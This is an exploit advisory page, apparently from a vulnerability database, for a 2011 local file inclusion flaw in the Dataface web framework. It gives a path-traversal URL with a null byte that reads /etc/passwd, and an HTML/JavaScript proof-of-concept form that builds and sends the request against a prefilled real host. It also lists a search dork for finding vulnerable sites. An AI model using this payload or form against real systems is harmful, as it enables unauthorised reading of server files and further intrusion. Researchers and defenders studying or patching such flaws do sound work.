Dataface Local File Inclusion

2011-06-08 / 2011-06-09
Credit: ItSecTeam
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

//========================================================================== //( #Topic : Dataface //( #Bug type : local file include //( #Advisory : http://xataface.com/ //========================================================================== //( #Author : ItSecTeam //( #Email : Bug@ITSecTeam.com //( #Website: http://www.itsecteam.com //( #Forum : http://forum.ITSecTeam.com //( #dork : Powered by Dataface //( #Thanks : ahmadbady //--------------------------------------------------------------------- Sample: http://server/index.php?-action=../../../../../../etc/passwd%00 Poc: <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>coded by ITSecTeam</title> <script language="JavaScript"> function it(){ xpl.action= xpl.victim.value+xpl.path.value+xpl.file.value+xpl.lfi.value;xpl.submit(); } </script> </head> <body bgcolor="#FFFFFF"> <p align="left"><font color="#0000FF">Dataface portal lfi vuln</font></p> <p align="left"><font color="#0000FF">-----------------------------------</font></p> <form method="post" name="xpl" onSubmit="it();"> <p align="left"> <font size="2" face="Tahoma"> victim: <input type="text" name="victim" size="33";" style="color: #FFFFFF; background-color: #000000" value="http://apps.weblite.ca"> path: <input type="text" name="path" size="20";" style="color: #FFFFFF; background-color: #000000" value="/"> file: <input type="text" name="file" size="20";" style="color: #FFFFFF; background-color: #000000" value="index.php?-action="> </font> </p> <p align="left"> <font size="2" face="Tahoma"> lfi: <input type="text" name="lfi" size="115";" style="color: #FFFFFF; background-color: #000000" value="../../../../../../etc/passwd%00"> </p> </p> <center> </p> <p><input type="submit" value="GO" name="B1" style="float: left"><input type="reset" value="reset" name="B2" style="float: left"></p> </form> <p><br> </p> </center> <font color="#0000FF">------------------------------------------</font></body></body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top